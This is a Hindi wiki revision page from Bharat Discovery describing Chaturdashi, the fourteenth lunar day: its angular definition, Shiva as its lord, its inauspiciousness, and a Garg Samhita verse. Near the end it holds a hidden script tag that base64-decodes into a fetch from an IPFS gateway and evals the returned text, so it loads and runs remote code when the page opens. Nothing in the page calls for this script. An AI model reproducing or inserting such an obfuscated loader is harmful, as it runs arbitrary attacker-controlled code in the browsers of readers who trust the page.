Difference between revisions of "चतुर्दशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[सूर्य ग्रह|सूर्य]] से [[चंद्र ग्रह|चन्द्र]] का अन्तर जब 157° से 168° तक होता है, तब [[शुक्ल पक्ष]] की चतुर्दशी और 337° से 348° तक कृष्ण चतृर्दशी रहती है।  
+
*[[सूर्य ग्रह|सूर्य]] से [[चंद्र ग्रह|चन्द्र]] का अन्तर जब 157° से 168° तक होता है, तब [[शुक्ल पक्ष]] की चतुर्दशी और 337° से 348° तक कृष्ण चतुर्दशी रहती है।  
 
*चतुर्दशी के स्वामी भगवान [[शिव]] हैं।  
 
*चतुर्दशी के स्वामी भगवान [[शिव]] हैं।  
 
*चतुर्दशी तिथि के रिक्ता संज्ञक होने से दोनों पक्षों की चतुर्दशी में समस्त शुभ कार्य त्याज्य है। इसीलिये इसे ‘क्रूरा’ कहा गया है।
 
*चतुर्दशी तिथि के रिक्ता संज्ञक होने से दोनों पक्षों की चतुर्दशी में समस्त शुभ कार्य त्याज्य है। इसीलिये इसे ‘क्रूरा’ कहा गया है।
Line 10: Line 10:
 
*विशेष – चतुर्दशी तिथि [[चंद्र ग्रह|चन्द्रमा ग्रह]] की जन्म तिथि है।  
 
*विशेष – चतुर्दशी तिथि [[चंद्र ग्रह|चन्द्रमा ग्रह]] की जन्म तिथि है।  
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=  
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 28: Line 20:
 
[[Category:कैलंडर]]
 
[[Category:कैलंडर]]
 
[[Category:संस्कृति कोश]]
 
[[Category:संस्कृति कोश]]
[[Category:हिन्दू धर्म]] [[Category:हिन्दू धर्म कोश]]  
+
[[Category:हिन्दू धर्म]] [[Category:हिन्दू धर्म कोश]][[Category:धर्म कोश]]  
 
__INDEX__
 
__INDEX__

Latest revision as of 12:14, 21 March 2014

  • soory se chandr ka antar jab 157° se 168° tak hota hai, tab shukl paksh ki chaturdashi aur 337° se 348° tak krishna chaturdashi rahati hai.
  • chaturdashi ke svami bhagavan shiv haian.
  • chaturdashi tithi ke rikta sanjnak hone se donoan pakshoan ki chaturdashi mean samast shubh kary tyajy hai. isiliye ise ‘kroora’ kaha gaya hai.
  • chaturdashi tithi ki disha pashchim hai.
  • garg sanhita ke mat se-

ugra chaturdashi vindyaddaroonyatr karayeth.
bandhanan rodhanan chaiv patanan ch visheshatah..

  • chaturdashi tithi ko shiv ka poojan v vrat uttam rahata hai.
  • chaturdashi ki amritakala ko svayan bhagavan shiv hi pite haian.
  • vishesh – chaturdashi tithi chandrama grah ki janm tithi hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh